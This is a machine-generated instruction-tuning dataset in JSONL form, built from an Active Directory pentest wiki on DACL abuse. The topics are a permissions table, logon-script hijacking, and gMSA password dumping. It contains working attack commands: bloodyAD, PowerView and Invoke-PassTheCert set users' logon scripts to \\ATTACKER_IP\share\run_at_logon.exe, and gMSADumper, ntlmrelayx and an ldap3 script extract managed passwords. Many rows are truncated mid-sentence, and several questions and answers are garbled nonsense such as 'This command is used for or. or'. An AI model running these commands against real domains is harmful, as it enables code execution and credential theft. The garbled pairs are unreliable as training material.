tools, flags, and syntax.", "user": "Show me how to do DACL abuse - BloodHound ACE edges", "response": "BloodHound has the ability to map abuse paths, with some that rely on DACL abuse. The following edges are not includes in the mindmap above:\n\n* AddKeyCredentialLink, a write permission on an object's Key-Credential-Link attribute, for Shadow Credentials attacks\n* WriteSPN, a write permission on an object's Service-Principal-Name attribute, for targeted Kerberoasting and SPN jacking attacks\n* AddSelf, similar to AddMember. While AddMember is WriteProperty access right on the target's Member attribute, AddSelf is a Self access right on the target's Member attribute, allowing the attacker to add itself to the target group, instead of adding arbitrary principals.\n* AddAllowedToAct, a write permission on an object's msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute, for Kerberos RBCD attacks\n* SyncLAPSPassword, both DS-GetChanges and DS-GetChangesInFilteredSet, for synchronizing LAPS password domain-wise\n* WriteAccountRestrictions, which refers to the User-Account-Restrictions property set, which contains enough permissions to modify the msDS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute of the target objects, for Kerberos RBCD attacks", "metadata": {"corpus_index": 433, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about DACL abuse - Permisssions index?"}, {"role": "assistant", "content": "The following table should help for better understanding of the ACE types and what they allow.\n\n| Common name | Permission value / GUID | Permission type | Description |\n| --- | --- | --- | --- |\n| WriteDacl | ADS_RIGHT_WRITE_DAC | Access Right | Edit the object's DACL (i.e. \"inbound\" permissions). |\n| GenericAll | ADS_RIGHT_GENERIC_ALL | Access Right | Combination of almost all other rights. |\n| GenericWrite | ADS_RIGHT_GENERIC_WRITE | Access Right | Combination of write permissions (Self, WriteProperty) among other things. |\n| WriteProperty | ADS_RIGHT_DS_WRITE_PROP | Access Right | Edit one of the object's attributes. The attribute is referenced by an \"ObjectType GUID\". |\n| WriteOwner | ADS_RIGHT_WRITE_OWNER | Access Right | Assume the ownership of the object (i.e. new owner of the victim = attacker, cannot be set to another user).With the \"SeRestorePrivilege\" right it is possible to specify an arbitrary owner. |\n| Self | ADS_RIGHT_DS_SELF | Access Right | Perform \"Validated writes\" (i.e. edit an attribute's value and have that value verified and validate by AD). The \"Validated writes\" is referenced by an \"ObjectType GUID\". |\n| AllExtendedRights | ADS_RIGHT_DS_CONTROL_ACCESS | Access Right | Peform \"Extended rights\". \"AllExtendedRights\" refers to that permission being unrestricted. This right can be restricted by specifying the extended right in the \"ObjectType GUID\". |\n| User-Force-Change-Password | 00299570-246d-11d0-a768-00aa006e0529 | Control Access Right (extended right) | Change the password of the object without having to know the previous one. |\n| DS-Replication-Get-Changes | 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| DS-Replication-Get-Changes-All | 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| Self-Membership | bf9679c0-0de6-11d0-a285-00aa003049e2 | Validate Wri"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about DACL abuse - Permisssions index?", "response": "The following table should help for better understanding of the ACE types and what they allow.\n\n| Common name | Permission value / GUID | Permission type | Description |\n| --- | --- | --- | --- |\n| WriteDacl | ADS_RIGHT_WRITE_DAC | Access Right | Edit the object's DACL (i.e. \"inbound\" permissions). |\n| GenericAll | ADS_RIGHT_GENERIC_ALL | Access Right | Combination of almost all other rights. |\n| GenericWrite | ADS_RIGHT_GENERIC_WRITE | Access Right | Combination of write permissions (Self, WriteProperty) among other things. |\n| WriteProperty | ADS_RIGHT_DS_WRITE_PROP | Access Right | Edit one of the object's attributes. The attribute is referenced by an \"ObjectType GUID\". |\n| WriteOwner | ADS_RIGHT_WRITE_OWNER | Access Right | Assume the ownership of the object (i.e. new owner of the victim = attacker, cannot be set to another user).With the \"SeRestorePrivilege\" right it is possible to specify an arbitrary owner. |\n| Self | ADS_RIGHT_DS_SELF | Access Right | Perform \"Validated writes\" (i.e. edit an attribute's value and have that value verified and validate by AD). The \"Validated writes\" is referenced by an \"ObjectType GUID\". |\n| AllExtendedRights | ADS_RIGHT_DS_CONTROL_ACCESS | Access Right | Peform \"Extended rights\". \"AllExtendedRights\" refers to that permission being unrestricted. This right can be restricted by specifying the extended right in the \"ObjectType GUID\". |\n| User-Force-Change-Password | 00299570-246d-11d0-a768-00aa006e0529 | Control Access Right (extended right) | Change the password of the object without having to know the previous one. |\n| DS-Replication-Get-Changes | 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| DS-Replication-Get-Changes-All | 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| Self-Membership | bf9679c0-0de6-11d0-a285-00aa003049e2 | Validate Wri", "metadata": {"corpus_index": 434, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do DACL abuse - Permisssions index"}, {"role": "assistant", "content": "The following table should help for better understanding of the ACE types and what they allow.\n\n| Common name | Permission value / GUID | Permission type | Description |\n| --- | --- | --- | --- |\n| WriteDacl | ADS_RIGHT_WRITE_DAC | Access Right | Edit the object's DACL (i.e. \"inbound\" permissions). |\n| GenericAll | ADS_RIGHT_GENERIC_ALL | Access Right | Combination of almost all other rights. |\n| GenericWrite | ADS_RIGHT_GENERIC_WRITE | Access Right | Combination of write permissions (Self, WriteProperty) among other things. |\n| WriteProperty | ADS_RIGHT_DS_WRITE_PROP | Access Right | Edit one of the object's attributes. The attribute is referenced by an \"ObjectType GUID\". |\n| WriteOwner | ADS_RIGHT_WRITE_OWNER | Access Right | Assume the ownership of the object (i.e. new owner of the victim = attacker, cannot be set to another user).With the \"SeRestorePrivilege\" right it is possible to specify an arbitrary owner. |\n| Self | ADS_RIGHT_DS_SELF | Access Right | Perform \"Validated writes\" (i.e. edit an attribute's value and have that value verified and validate by AD). The \"Validated writes\" is referenced by an \"ObjectType GUID\". |\n| AllExtendedRights | ADS_RIGHT_DS_CONTROL_ACCESS | Access Right | Peform \"Extended rights\". \"AllExtendedRights\" refers to that permission being unrestricted. This right can be restricted by specifying the extended right in the \"ObjectType GUID\". |\n| User-Force-Change-Password | 00299570-246d-11d0-a768-00aa006e0529 | Control Access Right (extended right) | Change the password of the object without having to know the previous one. |\n| DS-Replication-Get-Changes | 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| DS-Replication-Get-Changes-All | 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| Self-Membership | bf9679c0-0de6-11d0-a285-00aa003049e2 | Validate Wri"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do DACL abuse - Permisssions index", "response": "The following table should help for better understanding of the ACE types and what they allow.\n\n| Common name | Permission value / GUID | Permission type | Description |\n| --- | --- | --- | --- |\n| WriteDacl | ADS_RIGHT_WRITE_DAC | Access Right | Edit the object's DACL (i.e. \"inbound\" permissions). |\n| GenericAll | ADS_RIGHT_GENERIC_ALL | Access Right | Combination of almost all other rights. |\n| GenericWrite | ADS_RIGHT_GENERIC_WRITE | Access Right | Combination of write permissions (Self, WriteProperty) among other things. |\n| WriteProperty | ADS_RIGHT_DS_WRITE_PROP | Access Right | Edit one of the object's attributes. The attribute is referenced by an \"ObjectType GUID\". |\n| WriteOwner | ADS_RIGHT_WRITE_OWNER | Access Right | Assume the ownership of the object (i.e. new owner of the victim = attacker, cannot be set to another user).With the \"SeRestorePrivilege\" right it is possible to specify an arbitrary owner. |\n| Self | ADS_RIGHT_DS_SELF | Access Right | Perform \"Validated writes\" (i.e. edit an attribute's value and have that value verified and validate by AD). The \"Validated writes\" is referenced by an \"ObjectType GUID\". |\n| AllExtendedRights | ADS_RIGHT_DS_CONTROL_ACCESS | Access Right | Peform \"Extended rights\". \"AllExtendedRights\" refers to that permission being unrestricted. This right can be restricted by specifying the extended right in the \"ObjectType GUID\". |\n| User-Force-Change-Password | 00299570-246d-11d0-a768-00aa006e0529 | Control Access Right (extended right) | Change the password of the object without having to know the previous one. |\n| DS-Replication-Get-Changes | 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| DS-Replication-Get-Changes-All | 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 | Control Access Right (extended right) | One of the two extended rights needed to operate a DCSync. |\n| Self-Membership | bf9679c0-0de6-11d0-a285-00aa003049e2 | Validate Wri", "metadata": {"corpus_index": 434, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about DACL abuse - Talk :microphone:"}, {"role": "assistant", "content": "> [!YOUTUBE] https://www.youtube.com/watch?v=_nGpZ1ydzS8"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about DACL abuse - Talk :microphone:", "response": "> [!YOUTUBE] https://www.youtube.com/watch?v=_nGpZ1ydzS8", "metadata": {"corpus_index": 435, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through DACL abuse - Talk :microphone:"}, {"role": "assistant", "content": "> [!YOUTUBE] https://www.youtube.com/watch?v=_nGpZ1ydzS8"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through DACL abuse - Talk :microphone:", "response": "> [!YOUTUBE] https://www.youtube.com/watch?v=_nGpZ1ydzS8", "metadata": {"corpus_index": 435, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/index.md", "page_title": "DACL abuse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Logon script"}, {"role": "assistant", "content": "> [!NOTE]\n> It is worth noting that during lab testing, I couldn't find a way to practice this scenario. Since I didn't find practical enough resources on the Internet, feel free to reach out if you manage to exploit this.\n\nThis abuse can be carried out when controlling an object that has a GenericAll or GenericWrite over the target, or a WriteProperty premission over the target's logon script attribute (i.e. scriptPath or msTSInitialProgram).\n\nThe attacker can make the user execute a custom script at logon.\n\n::: tabs\n\n=== UNIX-like\n\nThis can be achieved with bloodyAD.\n```bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSInitialProgram -v '\\\\1.2.3.4\\share\\file.exe'\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSWorkDirectory -v 'C:\\'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Logon script", "response": "> [!NOTE]\n> It is worth noting that during lab testing, I couldn't find a way to practice this scenario. Since I didn't find practical enough resources on the Internet, feel free to reach out if you manage to exploit this.\n\nThis abuse can be carried out when controlling an object that has a GenericAll or GenericWrite over the target, or a WriteProperty premission over the target's logon script attribute (i.e. scriptPath or msTSInitialProgram).\n\nThe attacker can make the user execute a custom script at logon.\n\n::: tabs\n\n=== UNIX-like\n\nThis can be achieved with bloodyAD.\n```bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSInitialProgram -v '\\\\1.2.3.4\\share\\file.exe'\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSWorkDirectory -v 'C:\\'", "metadata": {"corpus_index": 436, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Logon script"}, {"role": "assistant", "content": "> [!NOTE]\n> It is worth noting that during lab testing, I couldn't find a way to practice this scenario. Since I didn't find practical enough resources on the Internet, feel free to reach out if you manage to exploit this.\n\nThis abuse can be carried out when controlling an object that has a GenericAll or GenericWrite over the target, or a WriteProperty premission over the target's logon script attribute (i.e. scriptPath or msTSInitialProgram).\n\nThe attacker can make the user execute a custom script at logon.\n\n::: tabs\n\n=== UNIX-like\n\nThis can be achieved with bloodyAD.\n```bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSInitialProgram -v '\\\\1.2.3.4\\share\\file.exe'\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSWorkDirectory -v 'C:\\'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Logon script", "response": "> [!NOTE]\n> It is worth noting that during lab testing, I couldn't find a way to practice this scenario. Since I didn't find practical enough resources on the Internet, feel free to reach out if you manage to exploit this.\n\nThis abuse can be carried out when controlling an object that has a GenericAll or GenericWrite over the target, or a WriteProperty premission over the target's logon script attribute (i.e. scriptPath or msTSInitialProgram).\n\nThe attacker can make the user execute a custom script at logon.\n\n::: tabs\n\n=== UNIX-like\n\nThis can be achieved with bloodyAD.\n```bash\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSInitialProgram -v '\\\\1.2.3.4\\share\\file.exe'\nbloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user msTSWorkDirectory -v 'C:\\'", "metadata": {"corpus_index": 436, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe or in the context of penetration testing"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user scriptPath -v '\\\\1.2.3.4\\share\\file.exe'\n``\n\n=== Windows\n\nThis can be achieved with Set-DomainObject (PowerView module).\n\n`powershell\n\nSet-DomainObject testuser -Set @{'msTSInitialProgram'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n\nSet-DomainObject testuser -Set @{'scriptPath'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe or in the context of penetration testing", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user scriptPath -v '\\\\1.2.3.4\\share\\file.exe'\n``\n\n=== Windows\n\nThis can be achieved with Set-DomainObject (PowerView module).\n\n`powershell\n\nSet-DomainObject testuser -Set @{'msTSInitialProgram'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n\nSet-DomainObject testuser -Set @{'scriptPath'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 437, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on or"}, {"role": "assistant", "content": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user scriptPath -v '\\\\1.2.3.4\\share\\file.exe'\n``\n\n=== Windows\n\nThis can be achieved with Set-DomainObject (PowerView module).\n\n`powershell\n\nSet-DomainObject testuser -Set @{'msTSInitialProgram'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n\nSet-DomainObject testuser -Set @{'scriptPath'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on or", "response": "bloodyAD --host \"$DC_IP\" -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" set object vulnerable_user scriptPath -v '\\\\1.2.3.4\\share\\file.exe'\n``\n\n=== Windows\n\nThis can be achieved with Set-DomainObject (PowerView module).\n\n`powershell\n\nSet-DomainObject testuser -Set @{'msTSInitialProgram'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n\nSet-DomainObject testuser -Set @{'scriptPath'='\\\\ATTACKER_IP\\share\\run_at_logon.exe'} -Verbose\n`\n\nThe Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell).\n\n> Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).\n``powershell", "metadata": {"corpus_index": 437, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do or"}, {"role": "assistant", "content": "=== Windows\n\nThis can be achieved with [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do or", "response": "=== Windows\n\nThis can be achieved with [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject/) ([PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) module).", "metadata": {"corpus_index": 438, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for or. or"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for or. or", "metadata": {"corpus_index": 438, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Overwrite the values of the 'msTSInitialProgram' and 'scriptPath' attributes for 'John JD. DOE' user to '\\\\ATTACKER_IP\\share\\run_at_logon.exe'?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'msTSInitialProgram' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\nInvoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'scriptPath' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Overwrite the values of the 'msTSInitialProgram' and 'scriptPath' attributes for 'John JD. DOE' user to '\\\\ATTACKER_IP\\share\\run_at_logon.exe'?", "response": "Invoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'msTSInitialProgram' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\nInvoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'scriptPath' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\n```\n\n:::", "metadata": {"corpus_index": 439, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Overwrite the values of the 'msTSInitialProgram' and 'scriptPath' attributes for 'John JD. DOE' user to '\\\\ATTACKER_IP\\share\\run_at_logon.exe' during a pentest?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'msTSInitialProgram' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\nInvoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'scriptPath' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Overwrite the values of the 'msTSInitialProgram' and 'scriptPath' attributes for 'John JD. DOE' user to '\\\\ATTACKER_IP\\share\\run_at_logon.exe' during a pentest?", "response": "Invoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'msTSInitialProgram' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\nInvoke-PassTheCert -Action 'OverwriteValueInAttribute' -LdapConnection $LdapConnection -Object 'CN=John JD. DOE,CN=Users,DC=X' -Attribute 'scriptPath' -Value '\\\\ATTACKER_IP\\share\\run_at_logon.exe'\n```\n\n:::", "metadata": {"corpus_index": 439, "category": "linux", "source_file": "docs/src/ad/movement/dacl/logon-script.md", "page_title": "Logon script", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about ReadGMSAPassword"}, {"role": "assistant", "content": "This abuse stands out a bit from other abuse cases. It can be carried out when controlling an object that has enough permissions listed in the target gMSA account's msDS-GroupMSAMembership attribute's DACL. Usually, these objects are principals that were configured to be explictly allowed to use the gMSA account.\n\nThe attacker can then read the gMSA (group managed service accounts) password of the account if those requirements are met.\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, gMSADumper (Python) can be used to read and decode gMSA passwords. It supports cleartext NTLM, pass-the-hash and Kerberoas authentications.\n\n``bash\ngMSADumper.py -u 'user' -p 'password' -d 'domain.local'\n`\n\nAlternative 1: Impacket's ntlmrelayx (Python) tool can be used to read and decode gMSA passwords. :warning: Some tests showed ntlmrelayx missed entries gMSADumper didn't.\n\n`bash\nntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs \n`\n\n> [!TIP]\n> In order to easily fake a relayed authentication, once the relay servers are up and running, the tester can browse http://127.0.0.1/ in order to trigger a basic authentication that will then be relayed by ntlmrelayx, like this.\n\n---\nAlternative 2: The msDS-ManagedPassword attribute can also be manually obtained by running the following Python script. The following Python code can then be used to decode the blob.\n\n`python\nimport ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)\n`\n---\nAlternative 3: Using bloodyAD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about ReadGMSAPassword", "response": "This abuse stands out a bit from other abuse cases. It can be carried out when controlling an object that has enough permissions listed in the target gMSA account's msDS-GroupMSAMembership attribute's DACL. Usually, these objects are principals that were configured to be explictly allowed to use the gMSA account.\n\nThe attacker can then read the gMSA (group managed service accounts) password of the account if those requirements are met.\n\n::: tabs\n\n=== UNIX-like\n\nOn UNIX-like systems, gMSADumper (Python) can be used to read and decode gMSA passwords. It supports cleartext NTLM, pass-the-hash and Kerberoas authentications.\n\n``bash\ngMSADumper.py -u 'user' -p 'password' -d 'domain.local'\n`\n\nAlternative 1: Impacket's ntlmrelayx (Python) tool can be used to read and decode gMSA passwords. :warning: Some tests showed ntlmrelayx missed entries gMSADumper didn't.\n\n`bash\nntlmrelayx.py -t ldaps://10.0.0.5 -debug --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs \n`\n\n> [!TIP]\n> In order to easily fake a relayed authentication, once the relay servers are up and running, the tester can browse http://127.0.0.1/ in order to trigger a basic authentication that will then be relayed by ntlmrelayx, like this.\n\n---\nAlternative 2: The msDS-ManagedPassword attribute can also be manually obtained by running the following Python script. The following Python code can then be used to decode the blob.\n\n`python\nimport ldap3\ntarget_dn = \"\" # something like 'CN=Target User,OU=Standard Accounts,DC=domain,DC=local'\ndomain = \"domain\"\nusername = \"username\"\nuser = \"{}\\\\{}\".format(domain, username)\npassword = \"password\"\nserver = ldap3.Server(domain)\nconnection = ldap3.Connection(server = server, user = user, password = password, authentication = ldap3.NTLM)\nconnection.bind()\nconnection.search(target_dn, '(&(ObjectClass=msDS-GroupManagedServiceAccount))', search_scope=ldap3.SUBTREE, attributes=['sAMAccountName','msDS-ManagedPassword'])\nprint(connection.entries)\n`\n---\nAlternative 3: Using bloodyAD", "metadata": {"corpus_index": 440, "category": "active_directory", "source_file": "docs/src/ad/movement/dacl/readgmsapassword.md", "page_title": "ReadGMSAPassword", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, 